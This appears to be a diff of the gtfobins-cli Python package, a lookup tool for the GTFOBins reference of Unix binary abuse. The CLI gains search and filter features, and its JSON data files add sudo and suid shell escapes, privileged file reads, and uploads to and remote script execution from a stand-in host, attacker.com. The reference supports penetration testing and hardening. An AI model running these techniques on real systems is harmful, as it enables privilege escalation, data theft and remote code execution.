gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/__init__.py

@@ -1,2 +1,3 @@
-__version__ = "1.0.0"
+__version__ = "1.1.0"
 __author__ = "t0thkr1s"
+__maintainer__ = "kasem545"

gtfo/cli.py

@@ -3,6 +3,8 @@
 import argparse
 import json
 import os
+import sys
+from difflib import SequenceMatcher
 from pathlib import Path
 from string import Template
 
@@ -12,7 +14,7 @@ from pygments import highlight, formatters, lexers
 # Initialize colorama for Windows compatibility
 init(autoreset=True)
 
-banner = '''
+banner = r'''
          __    ___        __    _
   ___ _ / /_  / _/ ___   / /   (_)  ___   ___
  / _ `// __/ / _/ / _ \ / _ \ / /  / _ \ (_-<
@@ -25,6 +27,13 @@ PACKAGE_DIR = Path(__file__).parent
 data_dir = PACKAGE_DIR / "data"
 json_ext = ".json"
 
+EXPLOIT_TYPES = [
+    'shell', 'command', 'reverse-shell', 'non-interactive-reverse-shell',
+    'bind-shell', 'non-interactive-bind-shell', 'file-upload', 'file-download',
+    'file-write', 'file-read', 'library-load', 'suid', 'sudo', 'capabilities',
+    'limited-suid'
+]
+
 info = Template(Style.BRIGHT + '[ ' + Fore.GREEN + '*' + Fore.RESET + ' ] ' + Style.RESET_ALL + '$text')
 fail = Template(Style.BRIGHT + '[ ' + Fore.RED + '-' + Fore.RESET + ' ] ' + Style.RESET_ALL + '$text')
 title = Template(
@@ -34,6 +43,38 @@ description = Template(Style.DIM + '# ' + '$description' + Style.RESET_ALL)
 divider = '\n' + Style.BRIGHT + ' - ' * 10 + Style.RESET_ALL + '\n'
 
 
+def get_all_binaries():
+    """Get list of all available binary names."""
+    return sorted([f.stem for f in data_dir.glob('*.json')])
+
+
+def fuzzy_match(query, choices, threshold=0.4):
+    """Return choices that fuzzy match the query, sorted by relevance."""
+    results = []
+    query_lower = query.lower()
+    for choice in choices:
+        choice_lower = choice.lower()
+        # Exact substring match gets highest priority
+        if query_lower in choice_lower:
+            score = 1.0 if query_lower == choice_lower else 0.9
+        else:
+            score = SequenceMatcher(None, query_lower, choice_lower).ratio()
+        if score >= threshold:
+            results.append((choice, score))
+    return [r[0] for r in sorted(results, key=lambda x: (-x[1], x[0]))]
+
+
+def get_binaries_with_type(exploit_type):
+    """Get all binaries that have a specific exploitation type."""
+    matching = []
+    for json_file in data_dir.glob('*.json'):
+        with open(json_file) as f:
+            data = json.load(f)
+        if exploit_type in data.get('functions', {}):
+            matching.append(json_file.stem)
+    return sorted(matching)
+
+
 def parse_args():
     from . import __version__
     parser = argparse.ArgumentParser(
@@ -41,42 +82,173 @@ def parse_args():
         description="Command-line tool for GTFOBins - helps you bypass system security restrictions."
     )
     parser.add_argument('-v', '--version', action='version', version=f'%(prog)s {__version__}')
-    parser.add_argument('binary', metavar='binary', help='Unix binary to search for exploitation techniques')
+    parser.add_argument('binary', metavar='binary', nargs='?', help='Unix binary to search for exploitation techniques')
+    parser.add_argument('-s', '--search', metavar='TERM', help='Fuzzy search binaries by name')
+    parser.add_argument('-f', '--filter', metavar='TYPE', dest='exploit_type',
+                        help=f'Filter binaries by exploitation type: {", ".join(EXPLOIT_TYPES)}')
+    parser.add_argument('-i', '--interactive', action='store_true',
+                        help='Interactive mode with autocomplete')
+    parser.add_argument('-l', '--list', action='store_true', dest='list_all',
+                        help='List all available binaries')
     return parser.parse_args()
 
 
-def run(binary=None):
-    """Main function that can be called programmatically"""
-    if binary is None:
-        args = parse_args()
-        binary = args.binary
-    
+def display_binary(binary, filter_type=None):
+    """Display exploitation techniques for a binary."""
     file_path = data_dir / f"{binary}{json_ext}"
-    if file_path.exists():
-        print(info.safe_substitute(text="Supplied binary: " + binary))
-        print(info.safe_substitute(text="Please wait, loading data ... "))
-        with open(file_path) as source:
-            data = source.read()
-
-        json_data = json.loads(data)
-        if 'description' in json_data:
-            print('\n' + description.safe_substitute(description=json_data['description']))
-
-        for vector in json_data['functions']:
-            print(title.safe_substitute(title=str(vector).upper()))
-            index = 0
-            for code in json_data['functions'][vector]:
-                index = index + 1
-                if 'description' in code:
-                    print(description.safe_substitute(description=code['description']) + '\n')
-                print(highlight(code['code'], lexers.BashLexer(),
-                                formatters.TerminalTrueColorFormatter(style='igor')).strip())
-                if index != len(json_data['functions'][vector]):
-                    print(divider)
-
-        print('\n' + info.safe_substitute(text="Goodbye, friend."))
-    else:
+    if not file_path.exists():
         print(fail.safe_substitute(text="Sorry, couldn't find anything for " + binary))
+        return False
+
+    print(info.safe_substitute(text="Supplied binary: " + binary))
+    with open(file_path) as source:
+        json_data = json.load(source)
+
+    if 'description' in json_data:
+        print('\n' + description.safe_substitute(description=json_data['description']))
+
+    vectors = json_data['functions']
+    if filter_type:
+        vectors = {k: v for k, v in vectors.items() if k == filter_type}
+        if not vectors:
+            print(fail.safe_substitute(text=f"No '{filter_type}' techniques for {binary}"))
+            return False
+
+    for vector in vectors:
+        print(title.safe_substitute(title=str(vector).upper()))
+        for idx, code in enumerate(vectors[vector]):
+            if 'description' in code:
+                print(description.safe_substitute(description=code['description']) + '\n')
+            print(highlight(code['code'], lexers.BashLexer(),
+                            formatters.TerminalTrueColorFormatter(style='igor')).strip())
+            if idx != len(vectors[vector]) - 1:
+                print(divider)
+
+    print('\n' + info.safe_substitute(text="Goodbye, friend."))
+    return True
+
+
+def print_binary_list(binaries, columns=4):
+    """Print binaries in columns."""
+    if not binaries:
+        print(fail.safe_substitute(text="No binaries found."))
+        return
+    max_len = max(len(b) for b in binaries) + 2
+    per_row = columns
+    for i in range(0, len(binaries), per_row):
+        row = binaries[i:i + per_row]
+        print('  ' + ''.join(b.ljust(max_len) for b in row))
+
+
+def interactive_mode():
+    """Interactive mode with autocomplete."""
+    try:
+        from prompt_toolkit import prompt
+        from prompt_toolkit.completion import FuzzyWordCompleter
+    except ImportError:
+        print(fail.safe_substitute(text="Interactive mode requires 'prompt_toolkit'. Install with: pip install prompt_toolkit"))
+        sys.exit(1)
+
+    binaries = get_all_binaries()
+    completer = FuzzyWordCompleter(binaries)
+
+    print(info.safe_substitute(text=f"Interactive mode - {len(binaries)} binaries available"))
+    print(info.safe_substitute(text="Type binary name (Tab for autocomplete, Ctrl+C to exit)"))
+    print()
+
+    while True:
+        try:
+            user_input = prompt('gtfo> ', completer=completer).strip()
+            if not user_input:
+                continue
+            if user_input.lower() in ('exit', 'quit', 'q'):
+                break
+            display_binary(user_input)
+            print()
+        except KeyboardInterrupt:
+            break
+        except EOFError:
+            break
+
+    print('\n' + info.safe_substitute(text="Goodbye, friend."))
+
+
+def run(binary=None):
+    """Main function that can be called programmatically."""
+    args = parse_args() if binary is None else None
+
+    if args:
+        if args.interactive:
+            if args.list_all or args.search or args.binary or args.exploit_type:
+                print(fail.safe_substitute(text="Interactive mode cannot be combined with other options"))
+                return
+            interactive_mode()
+            return
+
+        if args.binary and (args.list_all or args.search):
+            print(fail.safe_substitute(text="Cannot combine binary with -l/--list or -s/--search"))
+            return
+
+        if args.list_all and args.search:
+            print(fail.safe_substitute(text="Cannot combine -l/--list with -s/--search"))
+            return
+
+        if args.exploit_type and args.exploit_type not in EXPLOIT_TYPES:
+            print(fail.safe_substitute(text=f"Unknown type '{args.exploit_type}'"))
+            print(info.safe_substitute(text=f"Valid types: {', '.join(EXPLOIT_TYPES)}"))
+            return
+
+        if args.list_all:
+            if args.exploit_type:
+                binaries = get_binaries_with_type(args.exploit_type)
+                label = f"Binaries with '{args.exploit_type}'"
+            else:
+                binaries = get_all_binaries()
+                label = "Available binaries"
+            if binaries:
+                print(info.safe_substitute(text=f"{label} ({len(binaries)}):"))
+                print()
+                print_binary_list(binaries)
+            else:
+                print(fail.safe_substitute(text=f"No binaries with '{args.exploit_type}'"))
+            return
+
+        if args.search:
+            pool = get_binaries_with_type(args.exploit_type) if args.exploit_type else get_all_binaries()
+            matches = fuzzy_match(args.search, pool)
+            if matches:
+                if args.exploit_type:
+                    label = f"Search '{args.search}' in '{args.exploit_type}'"
+                else:
+                    label = f"Search results for '{args.search}'"
+                print(info.safe_substitute(text=f"{label} ({len(matches)} matches):"))
+                print()
+                print_binary_list(matches)
+            else:
+                if args.exploit_type:
+                    print(fail.safe_substitute(text=f"No '{args.exploit_type}' binaries matching '{args.search}'"))
+                else:
+                    print(fail.safe_substitute(text=f"No binaries matching '{args.search}'"))
+            return
+
+        if args.exploit_type and not args.binary:
+            binaries = get_binaries_with_type(args.exploit_type)
+            if binaries:
+                print(info.safe_substitute(text=f"Binaries with '{args.exploit_type}' ({len(binaries)}):"))
+                print()
+                print_binary_list(binaries)
+            else:
+                print(fail.safe_substitute(text=f"No binaries with '{args.exploit_type}'"))
+            return
+
+        binary = args.binary
+
+    if not binary:
+        print(fail.safe_substitute(text="No binary specified. Use -h for help."))
+        return
+
+    filter_type = args.exploit_type if args else None
+    display_binary(binary, filter_type)
 
 
 def main():

gtfo/data/7z.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\n7z a -ttar -an -so $LFILE | 7z e -ttar -si -so\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so\n"
+      }
+    ]
+  }
+}

gtfo/data/aa-exec.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "aa-exec /bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "./aa-exec /bin/sh -p\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo aa-exec /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/ab.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-upload": [
+      {
+        "description": "Upload local file via HTTP POST request.",
+        "code": "URL=http://attacker.com/\nLFILE=file_to_send\nab -p $LFILE $URL\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. The response is returned as part of the verbose output of the program with some limitations on the length.",
+        "code": "URL=http://attacker.com/file_to_download\nab -v2 $URL\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "Upload local file via HTTP POST request.",
+        "code": "sudo install -m =xs $(which ab) .\nURL=http://attacker.com/\nLFILE=file_to_send\n./ab -p $LFILE $URL\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Upload local file via HTTP POST request.",
+        "code": "URL=http://attacker.com/\nLFILE=file_to_send\nsudo ab -p $LFILE $URL\n"
+      }
+    ]
+  }
+}

gtfo/data/acr.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "suid": [
+      {
+        "description": "",
+        "code": "sudo install acr $(which acr) .\ntouch Makefile && chmod +x Makefile\necho DATA > Makefile\n./acr -r Makefile\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo install acr $(which acr) .\ntouch Makefile && chmod +x Makefile\necho DATA > Makefile\nsudo acr -r Makefile\n"
+      }
+    ]
+  }
+}

gtfo/data/agetty.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "suid": [
+      {
+        
+        "code": "./agetty -o -p -l /bin/sh -a root tty\n"
+      }
+    ]
+  }
+}

gtfo/data/alpine.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nalpine -F \"$LFILE\"\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./alpine -F \"$LFILE\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo alpine -F \"$LFILE\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ansible-playbook.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "TF=$(mktemp)\necho '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF\nansible-playbook $TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "TF=$(mktemp)\necho '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF\nsudo ansible-playbook $TF\n"
+      }
+    ]
+  }
+}

gtfo/data/ansible-test.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ansible-test shell\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ansible-test shell\n"
+      }
+    ]
+  }
+}

gtfo/data/aoss.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "aoss /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo aoss /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/apache2ctl.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\napache2ctl -c \"Include $LFILE\" -k stop\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo apache2ctl -c \"Include $LFILE\" -k stop\n"
+      }
+    ]
+  }
+}

gtfo/data/apport-cli.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "apport-cli -f\n\n*** What kind of problem do you want to report?\n<SNIP>\nPlease choose (1/2/3/4/5/6/7/8/9/10/C): 1\n\n*** Collecting problem information\n<SNIP>\n\n*** What display problem do you observe?\n<SNIP>\n\nPlease choose (1/2/3/4/5/6/7/8/C): 2\n<SNIP>\n\n*** Send problem report to the developers?\n<SNIP>\nWhat would you like to do? Your options are:\n    <SNIP>\n    V: View report\n    <SNIP>\nPlease choose (S/V/K/I/C): V\n\n<AT THIS POINT, DEFAULT CLI TEXT EDITOR IS OPENED. FROM HERE, SHELL ESCAPE AND/OR PRIVIEDGED R/W DEPENDS UPON THE EDITOR>\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "",
+        "code": "apport-cli -f\n\n*** What kind of problem do you want to report?\n<SNIP>\nPlease choose (1/2/3/4/5/6/7/8/9/10/C): 1\n\n*** Collecting problem information\n<SNIP>\n\n*** What display problem do you observe?\n<SNIP>\n\nPlease choose (1/2/3/4/5/6/7/8/C): 2\n<SNIP>\n\n*** Send problem report to the developers?\n<SNIP>\nWhat would you like to do? Your options are:\n    <SNIP>\n    V: View report\n    <SNIP>\nPlease choose (S/V/K/I/C): V\n\n<AT THIS POINT, DEFAULT CLI TEXT EDITOR IS OPENED. FROM HERE, SHELL ESCAPE AND/OR PRIVIEDGED R/W DEPENDS UPON THE EDITOR>\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo apport-cli -f\n\n*** What kind of problem do you want to report?\n<SNIP>\nPlease choose (1/2/3/4/5/6/7/8/9/10/C): 1\n\n*** Collecting problem information\n<SNIP>\n\n*** What display problem do you observe?\n<SNIP>\n\nPlease choose (1/2/3/4/5/6/7/8/C): 2\n<SNIP>\n\n*** Send problem report to the developers?\n<SNIP>\nWhat would you like to do? Your options are:\n    <SNIP>\n    V: View report\n    <SNIP>\nPlease choose (S/V/K/I/C): V\n\n<AT THIS POINT, DEFAULT CLI TEXT EDITOR IS OPENED. FROM HERE, SHELL ESCAPE AND/OR PRIVIEDGED R/W DEPENDS UPON THE EDITOR>\n"
+      }
+    ]
+  }
+}

gtfo/data/apt-get.json

@@ -2,23 +2,23 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "apt-get changelog apt\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo apt-get changelog apt\n!/bin/sh\n"
       },
       {
-        "description": "For this to work the target package (e.g., 'sl') must not be installed.",
+        "description": "For this to work the target package (e.g., `sl`) must not be installed.",
         "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt-get install -c $TF sl\n"
       },
       {
-        "description": "When the shell exits the 'update' command is actually executed.",
-        "code": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh"
+        "description": "When the shell exits the `update` command is actually executed.",
+        "code": "sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/apt.json

@@ -2,23 +2,23 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
-        "code": "apt-get changelog apt\n!/bin/sh\n"
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "apt changelog apt\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
-        "code": "sudo apt-get changelog apt\n!/bin/sh\n"
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "sudo apt changelog apt\n!/bin/sh\n"
       },
       {
-        "description": "For this to work the target package (e.g., 'sl') must not be installed.",
+        "description": "For this to work the target package (e.g., `sl`) must not be installed.",
         "code": "TF=$(mktemp)\necho 'Dpkg::Pre-Invoke {\"/bin/sh;false\"}' > $TF\nsudo apt install -c $TF sl\n"
       },
       {
-        "description": "When the shell exits the 'update' command is actually executed.",
-        "code": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh"
+        "description": "When the shell exits the `update` command is actually executed.",
+        "code": "sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh\n"
       }
     ]
   }
-}
+}

gtfo/data/aptitude.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "aptitude changelog aptitude\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
+        "code": "sudo aptitude changelog aptitude\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/ar.json

@@ -1,19 +1,21 @@
 {
-  "description": "The file appears amid the binary content of the archive.",
   "functions": {
     "file-read": [
       {
-        "code": "ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+        
+        "code": "TF=$(mktemp -u)\nLFILE=file_to_read\nar r \"$TF\" \"$LFILE\"\ncat \"$TF\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+        
+        "code": "TF=$(mktemp -u)\nLFILE=file_to_read\n./ar r \"$TF\" \"$LFILE\"\ncat \"$TF\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ar r \"[output]\" \"[file]\"\ncat \"[output]\"\n"
+        
+        "code": "TF=$(mktemp -u)\nLFILE=file_to_read\nsudo ar r \"$TF\" \"$LFILE\"\ncat \"$TF\"\n"
       }
     ]
   }

gtfo/data/aria2c.json

@@ -3,21 +3,33 @@
   "functions": {
     "command": [
       {
-        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\naria2c --on-download-error=$TF http://x\n"
+        "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\naria2c --on-download-error=$TF http://x"
       },
       {
-        "description": "The remote file 'aaaaaaaaaaaaaaaa' (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. '--allow-overwrite' is needed if this is executed multiple times with the same GID.",
-        "code": "aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash [host]/aaaaaaaaaaaaaaaa"
+        "description": "The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.",
+        "code": "aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request. Use `--allow-overwrite` if needed.",
+        "code": "URL=http://attacker.com/file_to_get\nLFILE=file_to_save\naria2c -o \"$LFILE\" \"$URL\""
       }
     ],
     "sudo": [
       {
-        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x\n"
+        "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo aria2c --on-download-error=$TF http://x"
+      }
+    ],
+    "suid": [
+      {
+        "description": "It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.",
+        "code": "LFILE='/etc/passwd'\naria2c -i $LFILE"
       }
     ],
     "limited-suid": [
       {
-        "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\n./aria2c --on-download-error=$TF http://x\n"
+        "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\n./aria2c --on-download-error=$TF http://x"
       }
     ]
   }